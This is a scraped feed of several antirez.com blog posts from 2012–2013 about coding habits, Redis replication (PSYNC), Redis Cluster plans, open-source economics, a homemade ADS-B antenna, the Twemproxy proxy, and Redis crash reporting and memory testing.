If you ever wrote some complex piece of code you know what happens after some time: your mental model of the software starts to be very complex with different ideas nested inside other ideas, like the structure of your program is, after all.

So while you are writing this piece of code, you realize that because of it you need to do that other change. Something like "I'm freeing this object here, but it's connected to this two other objects and I need to do this and that in order to ensure consistent state".

The worst thing you can do is to interrupt what you are currently doing in order to fix the new problem. Instead just write freeMyObject() and don't care, but at the same time, open a different editor, and write:

* freeMyObject() should make sure to remove references from XYZ bla bla bla.

When you finished with the current function / task / whatever, re-read your notes and implement what is possible to implement. You'll get new ideas or new things to fix, use the same trick again, and log your ideas without interrupting the flow.

In this way parts of the program make sense, individually. You can address the other parts later. This is 100 times better than nested-thinking, where you need to stop, do another task, and return back. Humans don't have stack frames.

For my log I use Evernote because the log needs to have one characteristic: No save, No filenames, Nothing more than typing something. Evernote will save it for you, and is a different physical interface compared to your code editor. This in my experience improves the 2 seconds switch you need to log.

After some time your log starts to be long. When you realize most of it feels old as your code base and your idea of the system evolved, trace a like like this:

-------------------- OLD STUFF ---------------------

And continue logging again. From time to time however, re-read your old logs. You may find some gems. Comments]]>
http://antirez.com/news/51
An idea for Twitter http://antirez.com/news/50 http://antirez.com/news/50 Tue, 26 Feb 2013 15:40:24 +0000
But the good outcome is that now I created a @redisfeed account that I use in order to provide a stream of information to Redis users that are not interested in my personal tweets not related to Redis. Anyway when I say some important thing regarding Redis with my personal account, I just retweet in the other side, so this is a good setup.

However... I wonder if Twitter is missing an opportunity for providing a better service here, that is, the concept of "channels".

Basically I'm a single person, but I've multiple logical streams of informations:

1) I tweet about Redis.
2) I tweet about other technological stuff.
3) I say things related to my personal life.
4) Sometimes I tweet things in Italian language.

Maybe there are followers interested in just one or a few of these logical channels, so it would be cool for Twitter users to be able to follow only a subset of the channels of another twitter user.

Probably this breaks the idea of simplicity of Twitter, but I'm pretty sure there are ways to present such a feature in an interesting way: by default all users have a single channel and following them in general means to follow all the channels, it is only as a refinement and only if the user created multiple channels that you can fine-tune what you follow and what not, so basically the added complexity would be minimal.

I'm pretty sure that now that Twitter is designed with the average user in mind such a feature will never be implemented actually, without to mention that this may add some serious technological complexity to their infrastructure, but maybe in the long run such a feature may be more vital than we believe now because it is pretty related to the "information diet" concept. Comments]]>
http://antirez.com/news/50
News about Redis: 2.8 is shaping, I'm back on Cluster. http://antirez.com/news/49 http://antirez.com/news/49 Wed, 13 Feb 2013 15:40:06 +0000
1) I finished the Partial Resynchronization patch (aka PSYNC) and merged it into the unstable and 2.8 branch. You can read more about it here: http://antirez.com/news/47
2) We finally have keyspace changes notifications: http://redis.io/topics/notifications

Everything is already merged into our development branches, so the deal is closed, and Redis 2.8 will include both the features.

I'm especially super excited about PSYNC, as this is a not-feature, simply you don't have to deal with it, the only change is that slaves work A LOT better. I love adding stuff that is transparent for users, just making the system better and more robust.

What I'm even more excited about is the fact that now that PSYNC and notifications are into 2.8, I'll mostly freeze it and can finally focus on Redis Cluster.

It's a lot of time that I wait to finish Redis Cluster, now it's the right time because Redis 2.6 is out and seems very stable, people are just starting to really discovering it and the ways it is possible to use Lua scripting and the advanced bit operations to do more. Redis 2.8 is already consolidated as release, but requires a long beta stage because we touched the inner working of replication. So I can pause other incremental improvements for a bit to focus on Redis Cluster. Basically my plan is to work mostly to cluster as long as it does not reach beta quality, and for beta quality I mean, something that brave users may put into production.

Today I already started to commit new stuff to Cluster code. Hash slots are now 16384 instead of 4096, this means that we are now targeting clusters of ~1000 nodes. This decision was taken because there are big Redis users with already a few hundred of nodes running.

Another change is that probably, in order to ship Cluster ASAP, in the first stage I plan to use Redis Sentinel in order to failover master nodes (but Sentinel will be able to accept as configuration a list of addresses of cluster nodes and will fetch all the other nodes using CLUSTER NODES).

So basically the first version of Redis Cluster to hit a stable release will have the following features:

1) Automatic partition of key space.
2) Hot resharding.
3) Only single key operations supported.

The above is already implemented but there is more work to do in order to move all this from alpha to beta quality. There is also a significant amount of work to do in library clients, and I'll try to provide an initial reference implementation based on redis-rb (actually I hope to just write a wrapper library).

Note that "3" is here to stay, there are currently no plans to extend Cluster to anything requiring keys to be moved back on forth magically. But MIGRATE COPY will provide a way for users to move keys into spare instances to perform computations with multiple keys.

Of course all this modulo critical bugs. If there is something odd with stable releases I'll stop everything and fix it as usually :-) Comments]]>
http://antirez.com/news/49
A few thoughts about Open Source Software http://antirez.com/news/48 http://antirez.com/news/48 Sat, 26 Jan 2013 15:39:43 +0000
First of all, open source for me is not a way to contribute to the free software movement, but to contribute to humanity. This means a lot of things, for instance I don't care about what people do with my code, nor if they'll release back their modifications. I simply want people to use my code in one way or the other.

Especially I want people to have fun, learn new stuff, and *make money* with my code. For me other people making money out of something I wrote is not something that I lost, it is something that I gained.

1) I'm having a bigger effect in the world if somebody can pay the bills using my code.
2) If there are N subjects making money with my code, maybe they will be happy to share some of this money with me, or will be more willing to hire me.
3) I can be myself one of the subjects making money with my code, and with other open source software code.

For all this reasons my license of choice is the BSD licensed, that is the perfect incarnation of "do whatever you want" as a license.

However clearly not everybody thinks alike, and many programmers contributing to open source don't like the idea that other people can take the source code and create business out of it as a commercial product that is not released under the same license.
To me instead many of the rules that you need to follow to use the GPL license are a practical barrier reducing the actual freedom of what people can do with the source code. Also I've the feeling that receiving back contributions it is not too much related to the license: if something is useful people will contribute back in some way, because maintaining forks is not great. The real gold is where development happens. Unfixed, not evolved code bases are worth zero. If you as an open source developer can provide value, other parties will be more stimulated to get their changes incorporated.

Anyway, I'm much more happy with less patches merged and more freedom from the point of view of the user, than the reverse, so there is not much to argue for me.

In my opinion instead what the open source does not get back in a fair amount is money, not patches. The new startups movement, and the low costs of operations of many large IT companies, are based on the existence of so much open source code working well. Businesses should try to share a small fraction of the money they earn with the people that wrote the open source software that is a key factor for their success, and I think that a sane way to redistribute part of the money is by hiring those people to just write open source software (like VMware did with me), or to provide donations.

Many developers do a lot of work in their free time for passion, only a small percentage happens to be payed for their contribution to open source. Some redistribution may allow more people to focus on the code they write for passion and that possibly has a much *important effect* on the economy compared to what they do at work to get the salary every month. And unfortunately it is not possible to pay bills with pull requests, so why providing help to the project with source contributions is a good and sane thing to do, it is not enough in my opinion.

You can see all this from a different point of view, but what I see is that a lot of value in the current IT industry is provided by open source software, often written in the spare time, or with important efforts filling the time gaps between one thing and another thing you do in your work time, if your employer is kind enough to allow you to do so.

What I think is that this is economically suboptimal, a lot of smart coders could provide an economical boost if they could be more free to write what they love and what a lot of people are probably already using to make money. Comments]]>
http://antirez.com/news/48
PSYNC http://antirez.com/news/47 http://antirez.com/news/47 Wed, 16 Jan 2013 15:39:22 +0000
This is exactly what I'm going to do from the point of view of the big picture, however there are many smaller features that make a big difference from the point of view of the Redis user day to day operations. Such features can't be ignored as well. They are less shiny in a feature list, and they are not good to generate buzz and interest in new users, and sometimes boring to code, but they are very important from a practical point of view.

So I ended the year and I'm starting the new one spending considerable time on a feature that was long awaited by many users having production instances crunching data every day, that is, the ability for a slave to partially resynchronize with the master without requiring a full resynchronization every time.

The good news is that finally today I've an implementation that works well in my tests. This means that this feature will be present in Redis 2.8, so it is the right time to start making users aware of it, and to describe how it works.

Some background
---

Redis replication is a pretty brutal piece of code in many ways:

1) It works by re-playing on slaves every command that was received in the Redis master that actually produced a change in the data set.
2) From the point of view of slaves, masters are just a bit special clients, but they are almost like normal clients sending commands. No special replication protocol or data format used for replication.
3) It *used to force* a full resynchronization every time a slave connects to a master. This means, at every connection, the slave will receive a copy of the master data set, in form of an RDB file, and load it.

Because of this characteristics Redis replication has been very reliable from the point of view of corruption. If you always full-resync, there are little chances for inconsistency. Also it was architecturally trivial, because masters are like clients, no special protocol is used and so forth.

Simple and reliable, what can go wrong? Well, what goes wrong is that sometimes even when simplicity is very important, to do an O(N) work when zero work is needed is not a good idea. I'm looking at you, point three of my list.

Consider the following scenario:

* Slave connect to master, and full resync.
* Master and slave chat for one hour.
* Slave disconnects from Master because of some silly network issue for 2 seconds.

A full resynchronization to reconnect is required. It was a design sacrifice because after all we are dealing with RAM-sized data sets. It can't be so hard. But actually as RAM gets cheaper, and big users more interested in Redis, we have many production instances with big data sets that need to full resync at every network issue.

Also resynchronization involves unpleasant things:

1) The disk is involved, since the slave saving the RDB file needs to write that file somewhere.
2) The master is forced to create an RDB file. Not a big deal as this master is supposed to save or write the AOF anyway, but still, more I/O without a good reason.
3) The slave needs to block at some point after reconnection in order to load the RDB file into memory.

This time it was the case to introduce complexity in order to make things better.

# So now Redis sucks as well?

MySQL is one of the first databases I get exposed for sure, a few decades ago, and the first time I had to setup replication I was shocked about how much it sucked. Are you serious that I need to enable binary logs and deal with offset?

Redis replication, that everyone agrees is dead-simple to setup, is more or less a response to how much I dislike MySQL replication from the point of view of the "user interface".

Even if we needed partial replicaton, I didn't wanted Redis to be like that.
However to perform partial resynchronization you in some way or the other need something like that:

Hi Master! How are you? Remember that I used to be connected with you and we were such goooood friends?
Hey Slave! You still here piece of bastard...
Well, shut up and give me data starting from offset 282233943 before I signal you to the Authority Of The Lazy Databases.
Fu@**#$(*@($! ... 1010110010101001010100101 ...

So the obvious solution is to have a file in the master side with all the data so that when a slave wants to resync, we can provide any offset without problems just reading it from the file. Except that this sucks a lot: We became append-to-disk-bound even if AOF is disabled, need to deal with the file system that can get full, slow (Hey EC2!), and files to rotate one way or the other. Horrid.

So the following is a description about how Redis partial resynchronization implementation again accepts sacrifices to avoid to suck like that.

# Redis PSYNC

Redis partial resynchronization does two design sacrifices.
It accepts that the slave will be able to resynchronize only if:

1) It reconnects in a reasonable amount of time.
2) The master was not restarted.

Because of this two relaxed requirements, instead of using a file, we can use a simple buffer inside our... Memory! Don't worry, a very acceptable amount of memory.

So a Redis master is modified in order to:

* Unify the data that is sent to the slave, so that every slave receives exactly the same things. We were about here already, but SELECT and PING commands were sent in a slave-specific fashion. Now instead the replication output to slaves is unified.
* Take a backlog of what we send to slaves. So for instance we take 10 MB of past data.
* Take a replication global offset, that the user never needs to deal with. We simply provide this offset to the slave, that will increment it every time it receives data. This way the slave is able to ask for partial resynchronization indicating the offset to start with.

Oh also, we don't want the system to be fragile, so we use the master "run id", that is a concept that was introduced in Redis in the past as an unique identifier of a given instance execution. When the slave synchronizes with the master, it also gets the master run id, so that a next partial resynchronization attempt will be made only if the master is the same, as in, the exact same execution of Redis.

Also the PSYNC command was introduced as a variant of SYNC for partially resync capable instances.

# How all this works in practice?

When the slave gets disconnected, you'll see something like this:

[60051] 17 Jan 16:52:54.979 * Caching the disconnected master state.
[60051] 17 Jan 16:52:55.405 * Connecting to MASTER...
[60051] 17 Jan 16:52:55.405 * MASTER <-> SLAVE sync started
[60051] 17 Jan 16:52:55.405 * Non blocking connect for SYNC fired the event.
[60051] 17 Jan 16:52:55.405 * Master replied to PING, replication can continue...
[60051] 17 Jan 16:52:55.405 * Trying a partial resynchronization (request 6f0d582d3a23b65515644d7c61a10bf9b28094ca:30).
[60051] 17 Jan 16:52:55.406 * Successful partial resynchronization with master.
[60051] 17 Jan 16:52:55.406 * MASTER <-> SLAVE sync: Master accepted a Partial Resynchronization.

See the first line, the slave *caches* the master client structure, so that all the buffers are saved to be reused if we'll be able to resynchronize.

In the master side we'll see instead:

[59968] 17 Jan 16:52:55.406 * Slave asks for synchronization
[59968] 17 Jan 16:52:55.406 * Partial resynchronization request accepted. Sending 0 bytes of backlog starting from offset 30.

So basically, as long as the data is still available as no more than N bytes worth of Redis protocol (of write commands) was sent to the master, the slave will be still able to reconnect. Otherwise a full resynchronization will be performed. How much backlog to allocate is up to the user.

# Current status

The 'psync' branch on my private repository now seems to work very well, however this is Very Important Code and must be tested a lot. This is what I'm doing right now. When I'm considerably sure the code is solid, I'll merge into unstable and 2.8 branch. When it runs for weeks without issues and starts to be adopted by the brave early adopters, we'll release 2.8 with this and other new features. Comments]]>
http://antirez.com/news/47
ADS-B wine cork antenna http://antirez.com/news/46 http://antirez.com/news/46 Sun, 16 Dec 2012 15:38:36 +0000
About one week ago I received my RTLSDR dongle, entering the already copious crew of software defined radio enthusiasts.

It's really a lot of fun, for instance from my home that is at about 10 km from the Catania Airport I can listen the tower talking with the aircrafts in the 118.700 Mhz frequency with AM modulation, however because of lack of time I was not able to explore this further until the past Sunday.

My Sunday goal was to use the RTLSDR to see if I was able to capture some ADS-B message from the aircrafts lading or leaving from the airport. Basically ADS-B is a security device that is installed in most aircrafts that is used for collision avoidance and other stuff like this. Every aircraft broadcasts informations about heading, speed, altitude and so forth.

With software defined radio there are a lot of programs in order to demodulate this information (that is encoded in a fairly simple to decode format). I use "modes_rx" that is free software, just Google for it.

However this transmissions happen in the 1090 Mhz frequency. My toy antenna nor other rabbit ears antennas I had at home worked at all for this frequency, so I read a few things on Google and tried a simple design that actually works well and takes 10 minutes to build using just a bit of wire and a wine cork.

# Cork wine dipole antenna

Sorry but I know almost nothing about antennas. However I'll try to provide you the informations I've about the theoretical aspects of this antenna.

Technically speaking this antenna is an Half Wavelength Dipole. In practical terms it is two pieces aligned parallel wires with a small space between them, with a total length that is half the wavelength of the frequency I want to listen to.

Speed of light = 300 000 000 meters per second
Frequency I want to listen to = 1090 Mhz, that is, 1090 000 000 Hertz
Wavelength at frequency = 300 000 000 / 1090 000 000 = 275 millimeters.

The half of 275 millimeters is 137 millimeters more or less, so this is the length of our antenna:

img://antirez.com/misc/1090_antenna_1.jpg

Now you can ask, why half the wavelength? But even for a n00b like me this actually makes a lot of sense, look at this:

img://antirez.com/misc/1090_antenna_4.jpg

Basically if you imagine a sinusoidal wave, when one of the two pieces of the antenna is invested by the *high* part of the wave, the other is in the *low* side, and I guess that for induction this creates the current.

Ok, end of broscience for today.

# How to build it

Simply take two pieces of wire of 10 centimeters each, and insert then into the cork. Then blend the two wires to emulate the design in the picture trying to make the space between the two wires small enough. Finally cut the two wires so that they are more or less the same length, and for a total of 137 millimeters.

In the other side of the cork I connected my two wires that go to the RTLSDR. I'm so lazy that I not even soldered the wires... You probably should!

img://antirez.com/misc/1090_antenna_2.jpg

Finally the two connected wires go to a PAL-style connector like this:

img://antirez.com/misc/1090_antenna_3.jpg

That in turn is connected with an adapter for the much smaller connector in the RTLSDR USB dongle. Even with all this interruptions along the path I can receive many aircrafts like a boss, even from indoor, like this:

(-51 0.0000000000) Type 17 BDS0,9-1 (track report) from 3c6313 with velocity 299kt heading 129 VS -320
(-49 0.0000000000) Type 17 BDS0,5 (position report) from 3c6313 at (37.500388, 15.005891) at 9300ft
(-51 0.0000000000) Type 11 (all call reply) from 3c6313 in reply to interrogator 0 with capability level 6
(-51 0.0000000000) Type 17 BDS0,9-1 (track report) from 3c6313 with velocity 298kt heading 129 VS -320
(-51 0.0000000000) Type 17 BDS0,5 (position report) from 3c6313 at (37.499863, 15.006681) at 9300ft

... And so forth.

Have fun! And if you have tricks to make the antenna better while retaining the simplicity, please let me know. Comments]]>
http://antirez.com/news/46
Partial resyncs and synchronous replication. http://antirez.com/news/45 http://antirez.com/news/45 Tue, 11 Dec 2012 15:38:03 +0000
The idea is that we have a backlog of the replication stream, up to the specified amount of bytes (this will be in the order of a few megabytes by default).

If a slave lost the connection, it connects again, see if the master RUNID is the same, and asks to continue from a given offset. If this is possible, we continue, nothing is lost, and a full resynchronization is not needed. Otherwise if the offset is about data we no longer have in the backlog, we full resync.

Now what's interesting about this is that, in order to make this possible, both the slave and the master know about a global offset that is the replication offset, since the master was ever started.

Now, if we provide a command that returns this offset, it is simple for a client to simulate synchronous replication in Redis just sending the query, asking for the offset (think about MULTI/EXEC to do that) and then asking the same to the slave. Because Redis replication is very low latency, the client can simply do an optimistic "write, read-offset, read-offset-on-slave" and likely the offset we read on the slave will already be ok to continue (or, we can read it again with some pause).

This is already something that could be useful, but I wonder if we could build something even better starting from that, that is, a way to send Redis a command that blocks as long as the current replication offset was not acknowledged from at least N connected slaves, and returns when this happened with +OK.

I'm not promising that this will be available as we need to understand how useful is this and the complexity, but from an initial analysis this could be trivial to implement fast and reliably... and sounds pretty good.

More news ASAP. Comments]]>
http://antirez.com/news/45
Twemproxy, a Redis proxy from Twitter http://antirez.com/news/44 http://antirez.com/news/44 Mon, 03 Dec 2012 15:37:42 +0000
I've big plans about going distributed with the project, to the extent that I'm no longer evaluating any threaded version of Redis: for me from the point of view of Redis a core is like a computer, so that scaling multi core or on a cluster of computers is the same conceptually. Multiple instances is a share-nothing architecture. Everything makes sense AS LONG AS we have a *credible way* to shard :-)

This is why Redis Cluster will be the main focus of 2013 for Redis, and finally, now that Redis 2.6 is out and is showing to be pretty stable and mature, it is the right moment to focus on Redis Cluster, Redis Sentinel, and other long awaited improvements in the area of replication (partial resynchronization).

However the reality is that Redis Cluster is not yet production ready and requires months of work. Still our users already need to shard data on multiple instances in order to distribute the load, and especially in order to use many computers to get a big amount of RAM ready for data.

The sole option so far was client side sharding. Client side sharding has advantages as there are no intermediate layers between clients and nodes, nor routing of request, so it is a very scalable setup (linearly scalable, basically). However to implement it reliably requires some tuning, a way to take clients configuration in sync, and the availability of a solid client with consistent hashing support or some other partitioning algorithm.

Apparently there is a big news in the landscape, and has something to do with Twitter, where one of the biggest Redis farms deployed happen to serve timelines to users. So it comes as no surprise that the project I'm talking about in this blog post comes from the Twitter Open Source division.

Twemproxy
---

Twemproxy is a fast single-threaded proxy supporting the Memcached ASCII protocol and more recently the Redis protocol:

https://github.com/twitter/twemproxy

It is written entirely in C and is licensed under the Apache 2.0 License.
The project works on Linux and AFAIK can't be compiled on OSX because it relies on the epoll API.

I did my tests using my Ubuntu 12.04 desktop.

But well, I'm still not saying anything useful. What twemproxy does actually? (Note: I'll focus on the Redis part, but the project is also able to do the same things for memcached as well).

1) It works as a proxy between your clients and many Redis instances.
2) It is able to automatically shard data among the configured Redis instances.
3) It supports consistent hashing with different strategies and hashing functions.

What's awesome about Twemproxy is that it can be configured both to disable nodes on failure, and retry after some time, or to stick to the specified keys -> servers map. This means that it is suitable both for sharding a Redis data set when Redis is used as a data store (disabling the node ejection), and when Redis is using as a cache, enabling node-ejection for cheap (as in simple, not as in bad quality) high availability.

The bottom line here is: if you enable node-ejection your data may end into other nodes when a node fails, so there is no guarantee about consistency. On the other side if you disable node-ejection you need to have a per-instance high availability setup, for example using automatic failover via Redis Sentinel.

Installation
---

Before diving more inside the project features, I've good news, it is trivial to build on Linux. Well, not as trivial as Redis, but… you just need to follow those simple steps:

apt-get install automake
apt-get install libtool
git clone git://github.com/twitter/twemproxy.git
cd twemproxy
autoreconf -fvi
./configure --enable-debug=log
make
src/nutcracker -h

It is pretty trivial to configure as well, and there is sufficient documentation in the project github page to have a smooth first experience. For instance I used the following configuration:

redis1:
listen: 0.0.0.0:9999
redis: true
hash: fnv1a_64
distribution: ketama
auto_eject_hosts: true
timeout: 400
server_retry_timeout: 2000
server_failure_limit: 1
servers:
- 127.0.0.1:6379:1
- 127.0.0.1:6380:1
- 127.0.0.1:6381:1
- 127.0.0.1:6382:1

redis2:
listen: 0.0.0.0:10000
redis: true
hash: fnv1a_64
distribution: ketama
auto_eject_hosts: false
timeout: 400
servers:
- 127.0.0.1:6379:1
- 127.0.0.1:6380:1
- 127.0.0.1:6381:1
- 127.0.0.1:6382:1

Basically the first cluster is configured with node ejection, and the second as a static map among the configured instances.

What is great is that you can have multiple setups at the same time possibly involving the same hosts. However for production I find more appropriate to use multiple instances to use multiple cores.

Single point of failure?
---

Another very interesting thing is that, actually, using this setup does not mean you have a single point of failure, since you can run multiple instances of twemproxy and let your client connect to the first available.

Basically what you are doing with twemproxy is to separate the sharding logic from your client. At this point a basic client will do the trick, sharding will be handled by the proxy.

It is a straightforward but safe approach to partitioning IMHO.

Currently that Redis Cluster is not available, I would say, it is the way to go for most users that want a cluster of Redis instances today. But read about the limitations before to get too excited ;)

Limitations
---

I think that twemproxy do it right, not supporting multiple keys commands nor transactions. Currently is AFAIK even more strict than Redis Cluster that instead allows MULTI/EXEC blocks if all the commands are about the same key.

But IMHO it's the way to go, distribute the subset you can distribute efficiently, and pose this as a design challenge early to the user, instead to invest a big amount of resources into "just works" implementations that try to aggregate data from multiple instances, but that will hardly be fast enough once you start to have serious loads because of too big constant times to move data around.

However there is some support for commands with multiple keys. MGET and DEL are handled correctly. Interestingly MGET will split the request among different servers and will return the reply as a single entity. This is pretty cool even if I don't get the right performance numbers with this feature (see later).

Anyway the fact that multi-key commands and transactions are not supported it means that twemproxy is not for everybody, exactly like Redis Cluster itself. Especially since apparently EVAL is not supported (I think they should support it! It's trivial, EVAL is designed to work in a proxy like that because key names are explicit).

Things that could be improved
---

Error reporting is not always stellar. Sending a non supported command closes the connection. Similarly sending just a "GET" from redis-cli does not report any error about bad number of arguments but hangs the connection forever.

However other errors from the server are passed to the client correctly:

redis metal:10000> get list
(error) WRONGTYPE Operation against a key holding the wrong kind of value

Another thing that I would love to see is support for automatic failover. There are many alternatives:

1) twemproxy is already able to monitor instance errors, count the number of errors, and eject the node when enough errors are detected. Well it is a shame it is not able to take slave nodes as alternatives, and instead of eject nodes use the alternate nodes just after sending a SLAVE OF NOONE command. This would turn it into an HA solution as well.

2) Or alternatively, I would love if it could be able to work in tandem with Redis Sentinel, checking the Sentinel configuration regularly to upgrade the servers table if a failover happened.

3) Another alternative is to provide a way to hot-configure twemproxy so that on fail overs Sentinel could switch the configuration of the proxy ASAP.

There are many alternatives, but basically, some support for HA could be great.

Performances
---

This Thing Is Fast. Really fast, it is almost as fast as talking directly with Redis. I would say you lose 20% of performances at worst.

My only issue with performances is that IMHO MGET could use some improvement when the command is distributed among instances.

After all if the proxy has similar latency between it and all the Redis instances (very likely), if the MGETs are sent at the same time, likely the replies will reach the proxy about at the same time. So I expected to see almost the same numbers with an MGET as I see when I run the MGET against a single instance, but I get only 50% of the operations per second. Maybe it's the time to reconstruct the reply, I'm not sure.

Conclusions
---

It is a great project, and since Redis Cluster is yet not here, I strongly suggest Redis users to give it a try.

Personally I'm going to link it in some visible place in the Redis project site. I think the Twitter guys here provided some real value to Redis itself with their project, so…

Kudos! Comments]]>
http://antirez.com/news/44
Redis Crashes http://antirez.com/news/43 http://antirez.com/news/43 Mon, 03 Dec 2012 15:37:19 +0000 ===

I'm very serious about software reliability, and this is not just a good thing.
It is good in a sense, as I tend to work to ensure that the software I release is solid. At the same time I think I take this issue a bit too personally: I get upset if I receive a crash report that I can't investigate further for some reason, or that looks like almost impossible to me, or with an unhelpful stack trace.

Guess what? This is a bad attitude because to deliver bugs free software is simply impossible. We are used to think in terms of labels: "stable", "production ready", "beta quality". I think that these labels are actually pretty misleading if not put in the right perspective.

Software reliability is an incredibly complex mix of ingredients.

1) Precision of the specification or documentation itself. If you don't know how the software is supposed to behave, you have things that may be bugs or features. It depends on the point of view.
2) Amount of things not working accordingly to the specification, or causing a software crash. Let's call these just software "errors".
3) Percentage of errors that happen to be in the subset of the software that is actually used and stressed by most users.
4) Probability that the conditions needed for a given error to happen are met.

So what happens is that you code something, and this initial version will be as good as good and meticulous are you as a programmer, or as good is your team and organization if it is a larger software project involving many developers. But this initial version contains a number of errors anyway.

Then you and your users test, or simply use, this new code. All the errors that are likely to happen and to be recognized, because they live in the subset of the code that users hit the most, start to be discovered. Initially you discover a lot of issues in a short time, then every new bug takes more time to be found, probabilistically speaking, as it starts to be in the part of the code that is less stressed, or the conditions to make the error evident are unlikely to be met.

Basically your code is never free from errors. "alpha", "beta", "production read", and "rock solid" are just names we assign to the probability we believe there is for a serious error to be discovered in a reasonable time frame.

Redis crashes
===

Redis users are not likely to see Redis crashing without a good reason (Redis will abort on purpose in a few exceptional conditions). However from time to time there are bugs in Redis that will caused a server crash under certain conditions.

What makes crashes different from other errors is that in complex systems crashes are the perfect kind of "likely hard to reproduce error". Bug fixing is all about creating a mental model of how the software works to understand why it is not behaving as expected. Every time you can trigger the bug again, you add information to your model: eventually you have enough informations to understand and fix the bug.

Crashes on Redis are crashes happening on a long running program, that interacts with many clients that are sending command at different times, in a way that the sequence of commands and events is very hard to reproduce.

Crashes stop the server, provide little clues, and are usually very hard to reproduce. This means little information, poor model of what is happening, and ultimately, very hard to fix bugs.

If this is not enough, crashes are not only bad for developers, they are also very bad for users, as the software stops working after a crash, that is one of the biggest misbehaviors you can expect from a software.

This is why I hate Redis (and other software) crashes.

Stack traces
===

Are there ways to make crashes more *friendly*?

If a crash is reproducible, and if the user has time to spent with you, possibly from a far away time zone, maybe you can make a crash more friendly with a debugger. If you are lucky enough that data is not important for the user, you may also get a core dump (that contains a copy of the data set in the case of Redis).

However most of the crashes will simply not happen again in a practical amount of time, or the user can't help debugging, or data is too important to send you a core. So one of the first things I did to improve Redis crashes was to make it print a stack trace when it crashes.

This is an example of what you get if you send DEBUG SEGFAULT to the server:

EDIS BUG REPORT START: Cut & paste starting from here ===
[32827] 26 Nov 15:19:14.158 # Redis 2.6.4 crashed by signal: 11
[32827] 26 Nov 15:19:14.158 # Failed assertion: (:0)
[32827] 26 Nov 15:19:14.158 # --- STACK TRACE
0 redis-server 0x0000000103a15208 logStackTrace + 88
1 redis-server 0x0000000103a16544 debugCommand + 68
2 libsystem_c.dylib 0x00007fff8c5698ea _sigtramp + 26
3 ??? 0x0000000000000000 0x0 + 0
4 redis-server 0x00000001039ec145 call + 165
5 redis-server 0x00000001039ec77f processCommand + 895
6 redis-server 0x00000001039f7fd0 processInputBuffer + 160
7 redis-server 0x00000001039f6dfc readQueryFromClient + 396
8 redis-server 0x00000001039e82d3 aeProcessEvents + 643
9 redis-server 0x00000001039e851b aeMain + 59
10 redis-server 0x00000001039ef33e main + 1006
11 libdyld.dylib 0x00007fff91ef97e1 start + 0
12 ??? 0x0000000000000001 0x0 + 1

... more stuff ...

[32827] 26 Nov 15:19:14.163 # --- CURRENT CLIENT INFO
[32827] 26 Nov 15:19:14.163 # client: addr=127.0.0.1:56888 fd=5 age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=32768 obl=0 oll=0 omem=0 events=r cmd=debug
[32827] 26 Nov 15:19:14.163 # argv[0]: 'debug'
[32827] 26 Nov 15:19:14.163 # argv[1]: 'segfault'
[32827] 26 Nov 15:19:14.163 # --- REGISTERS
[32827] 26 Nov 15:19:14.163 #
RAX:0000000000000000 RBX:00007fb8e4800000
RCX:00000000000003e8 RDX:00007fff79804788
RDI:0000000000000000 RSI:0000000103a4e2bf
RBP:00007fff5c2194c0 RSP:00007fff5c2193e0
R8 :0000000050b37a62 R9 :0000000000000019
R10:0000000000000001 R11:0000000002000000
R12:0000000000026c0f R13:0000000103a6bc80
R14:00007fb8e3600000 R15:00007fb8e3600178
RIP:0000000103a16544 EFL:0000000000010246
CS :000000000000002b FS:0000000000000000 GS:0000000000000000
[32827] 26 Nov 15:19:14.164 # (00007fff5c219458) -> 00007fb8e3600000
[32827] 26 Nov 15:19:14.164 # (00007fff5c219450) -> 0000000000000001
[32827] 26 Nov 15:19:14.164 # (00007fff5c219448) -> 0000000000000000
[32827] 26 Nov 15:19:14.164 # (00007fff5c219440) -> 00007fff5c219470

... more stuff ...

And a lot more, including the INFO output and the full list of connected clients and their state.

Printing stack traces on crash is already a huge improvement over "segmentation fault, core dumped". A lot of times I can fix the issue just from the output I see, without asking anything to the user. Add to this that we have the arguments of the currently executed command.

I'm crazy enough that Redis logs registers and part of the stack as well. If you have this trace, and a copy of the redis-server executable that caused it (and users will send it to you easily), you can inspect a lot of state just from that.

EVERY MISSION CRITICAL SOFTWARE should do this.

Broken memory
===

So far so good. That kind of reporting on crashes, plus a gentle and helpful community of users, can help you improve the quality of the software you ship, a lot. But what happens if the bug is an hard one? A memory violation in a random place like a dictionary lookup in the context of a simple GET operation? Well, you are in big troubles. You can't ignore a bug like that, but inspecting it take a lot of time.

And guess what? Many times you do a lot of work for nothing, as Redis crashes only because the user was using broken memory.

Think along these lines: Redis uses memory a lot, and memory errors will easily amplify when you use a lot of data structures with pointers. If there is a broken bit it will easily end crashing the server in a short time.

Now let's scale this to the sum of all the memory that every single Redis instance out there is using right now. What you get is that Redis is like a parallel memory test working on many computers, waiting to spot some bit error. And as Redis gets more known and deployed? More memory tested every second.

The problem is that this giant memory test will not write "Hey, you got a problem in your memory!". The output will be a new issue in the Redis GitHub issue system, and me investigating non existing issues for hours.

First countermeasure
===

At some point, after the first endless investigations, I started to be smarter: when a bug looked suspicious I started the investigation with "Please, can you run a memory test to verify the computer memory and CPU are likely ok?".

However this requires the user to reboot the machine and run memtest86. Or at least to install some user space memory testing program like memtester available in most Linux distributions. Many times the user has no physical access at all to the box, or there is no "box" at all, the user is using a virtual machine somewhere.

After some time I realized that if Redis could be able to test the computer memory easily without requiring additional software, I would be able to receive more memory test reports from users.

This is why recent Redis instance can perform a memory test if you write something like that:

./redis-server --test-memory 4096

Where "4096" is the number of megabytes of RAM to test.

The test is not perfect but it showed to be pretty effective to detect normal memory errors, however there are more subtle errors like retention errors that happen if you set some memory cell to a given value, and wait some time, and then retry to read it, that are not detected by this test. But well, apparently most memory errors are simpler than that and can be more easily detected.

The quality of the detection also depends on the amount of time the user will let the memory test to run. There are errors that just happen rarely.

Anyway this test improved my experience with Redis crashes a lot. Sometimes I see a bug report, I just ask the user to test the RAM, and I get a message where the user acknowledges that there was a problem with a memory module.

However users rarely run a more accurate memory test like memtest86 for days, like they should after a crash. Many times it is simply not practical at all. So even when I get a "memory is fine" report I simply accept it as a matter of facts that memory is ok and I investigate the issue closely, but, if I never saw a crash like this reported at least one more time in recent times with different hardware, and there is no way to reproduce such a crash, after some efforts I'll simply stop investigating, taking the issue open for some more time, and finally closing it if no other similar crashes are reported.

Testing more memory
===

Even not considering that there are false negatives, with the current redis-server --test-memory approach there are two bigger problems.

1) Not every user will actually run the test after a crash.
2) Users running Redis using virtualization, possibly using a virtual machine provider like EC2, will never know if they are testing the same phyisical memory pages when they run redis-server --test-memory.

